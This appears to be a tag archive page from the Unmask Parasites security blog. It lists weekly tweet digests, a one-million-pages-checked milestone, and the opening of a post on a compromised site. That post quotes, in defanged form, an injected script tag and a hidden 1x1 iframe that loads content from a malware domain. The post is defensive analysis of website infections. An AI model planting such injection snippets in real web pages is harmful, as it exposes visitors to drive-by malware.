Milestone | Unmask Parasites. Blog.

Loading site search ...

Tweet Week: June 27 – July 3, 2011

04 Jul 11 Filed in Tweet Week with Comments Off

Selected short messages and links you might have missed if you don’t follow me on Twitter.

banned CO.CC and CO.BE sites, WordPress 3.2 new sys requirements, 1000 tweets, Unmask Parasites turns 3 years old »»

Tags: Image Search milestone scareware WordPress

Tweet Week: May 9-15, 2011

16 May 11 Filed in Tweet Week with Comments Off

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Google Image poisoning: articles, domains, statistics; free and dangerous WP themes, 1K subscribers …

Tags: black hat seo google Image Search Kaspersky Mac milestone Sophos Trend Micro WordPress

Last Tweet Week of 2010

03 Jan 11 Filed in Tweet Week with Comments Off

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Java Downloader malware, WordPress 3.0.4, 500 followers …»»

Tags: Java milestone WordPress

1 Million Pages Checked by Unmask Parasites!

05 Dec 10 Filed in Unmask Parasites with Comments Off

1 Million web pages have been checked by Unmask Parasites since July 1, 2008.
167,033 of them were found suspicious for one reason or another.

This happened on December 5, 2010 around 00:00 GMT.

Looking forward for the second million :)

Tags: milestone

Tweet Week: July 19-25, 2010

25 Jul 10 Filed in Tweet Week with Comments Off

Selected short messages and links you might have missed if you don’t follow me on Twitter.

VBulletin and Soholaunch security problems, Unmask Parasites milestone … »»

Tags: gumblar milestone Soholaunch vBulletin

Tweet Week: May 31 – June 6, 2010

06 Jun 10 Filed in Tweet Week with Comments Off

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Adobe and Java vulnerabilities, hotlinking, file permissions, $100 million scareware case etc. »»

Tags: adobe hotlinking Java milestone PHP

NewGeoCheck.js and Malicious AddThiss .net Iframe

19 May 10 Filed in Website exploits with 4 Comments

Yesterday, I checked one site that had the following text on its Google Safe Browsing diagnostic page:

Malicious software is hosted on 1 domain(s), including addthiss .net/.

Unmask Parasites didn’t detect anything suspicious but a quick manual check revealed the following script tag right after the <body> tag in every web page:

<sc ript type="text/javascript" src="newgeocheck.js"></script>

(Unmask Parasites doesn’t check .js file, so no wonder it couldn’t detect the source of the problem)

This script loaded an invisible iframe form addthiss .net.

<i frame width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" style="" src="hxxp://addthiss .net/ in.cgi?8"></iframe>
Here goes the real investigation »»